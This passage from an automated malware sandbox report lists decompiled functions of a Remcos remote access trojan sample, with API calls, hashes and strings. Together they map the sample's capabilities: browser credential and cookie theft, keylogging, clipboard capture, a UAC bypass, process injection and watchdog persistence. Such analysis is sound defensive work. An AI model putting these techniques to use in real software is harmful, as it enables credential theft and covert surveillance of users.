                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                          • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                          • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                          • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                        • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                        • API String ID: 65172268-860466531
                        • Opcode ID: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                        • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                        • Opcode Fuzzy Hash: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                        • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                        Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                        • FindClose.KERNEL32(00000000), ref: 0040B517
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                        • API String ID: 1164774033-3681987949
                        • Opcode ID: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                        • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                        • Opcode Fuzzy Hash: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                        • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                        Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$File$FirstNext
                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 3527384056-432212279
                        • Opcode ID: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                        • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                        • Opcode Fuzzy Hash: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                        • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                        Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                          • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                        • API String ID: 726551946-3025026198
                        • Opcode ID: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                        • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                        • Opcode Fuzzy Hash: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                        • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                        Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32 ref: 004159C7
                        • EmptyClipboard.USER32 ref: 004159D5
                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                        • GlobalLock.KERNEL32(00000000), ref: 004159FE
                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                        • CloseClipboard.USER32 ref: 00415A5A
                        • OpenClipboard.USER32 ref: 00415A61
                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                        • CloseClipboard.USER32 ref: 00415A89
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                        • String ID:
                        • API String ID: 3520204547-0
                        • Opcode ID: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                        • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                        • Opcode Fuzzy Hash: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                        • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                        Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0$1$2$3$4$5$6$7
                        • API String ID: 0-3177665633
                        • Opcode ID: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                        • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                        • Opcode Fuzzy Hash: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                        • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                        Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 00409B3F
                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                        • GetKeyState.USER32(00000010), ref: 00409B5C
                        • GetKeyboardState.USER32(?), ref: 00409B67
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                        • String ID: X[G
                        • API String ID: 1888522110-739899062
                        • Opcode ID: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                        • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                        • Opcode Fuzzy Hash: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                        • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                        Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 00406788
                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Object_wcslen
                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • API String ID: 240030777-3166923314
                        • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                        • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                        • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                        • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                        Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                        • GetLastError.KERNEL32 ref: 00419945
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                        • String ID:
                        • API String ID: 3587775597-0
                        • Opcode ID: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                        • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                        • Opcode Fuzzy Hash: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                        • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                        Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                          • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                        • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                        • String ID:
                        • API String ID: 2341273852-0
                        • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                        • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                        • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                        • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                        Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                        • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                        • GetLastError.KERNEL32 ref: 00409A1B
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                        • TranslateMessage.USER32(?), ref: 00409A7A
                        • DispatchMessageA.USER32(?), ref: 00409A85
                        Strings
                        • Keylogger initialization failure: error , xrefs: 00409A32
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                        • String ID: Keylogger initialization failure: error
                        • API String ID: 3219506041-952744263
                        • Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                        • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                        • Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                        • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                        Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                        • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressCloseCreateLibraryLoadProcsend
                        • String ID: SHDeleteKeyW$Shlwapi.dll
                        • API String ID: 2127411465-314212984
                        • Opcode ID: b8065b9836623536c08516bc274bfd8a167c6865f6e9b73682af5f29f8a9cf8d
                        • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                        • Opcode Fuzzy Hash: b8065b9836623536c08516bc274bfd8a167c6865f6e9b73682af5f29f8a9cf8d
                        • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                        Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                        • GetLastError.KERNEL32 ref: 0040B261
                        Strings
                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                        • [Chrome StoredLogins not found], xrefs: 0040B27B
                        • UserProfile, xrefs: 0040B227
                        • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • API String ID: 2018770650-1062637481
                        • Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                        • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                        • Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                        • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                        Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                        • GetLastError.KERNEL32 ref: 00416B02
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3534403312-3733053543
                        • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                        • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                        • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                        • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                        Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 004089AE
                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                          • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                          • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                          • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                        • String ID:
                        • API String ID: 4043647387-0
                        • Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                        • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                        • Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                        • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                        Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ManagerStart
                        • String ID:
                        • API String ID: 276877138-0
                        • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                        • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                        • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                        • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                        Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$CreateFirstNext
                        • String ID: @CG$XCG$>G
                        • API String ID: 341183262-3030817687
                        • Opcode ID: 232651b6631de9661e01008884487fa2ba37f4a7870c2f2a45051fa367f78adf
                        • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                        • Opcode Fuzzy Hash: 232651b6631de9661e01008884487fa2ba37f4a7870c2f2a45051fa367f78adf
                        • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                        Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                          • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                          • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                          • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                          • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                        • GetProcAddress.KERNEL32(00000000), ref: 00415977
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                        • String ID: PowrProf.dll$SetSuspendState
                        • API String ID: 1589313981-1420736420
                        • Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                        • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                        • Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                        • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                        Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
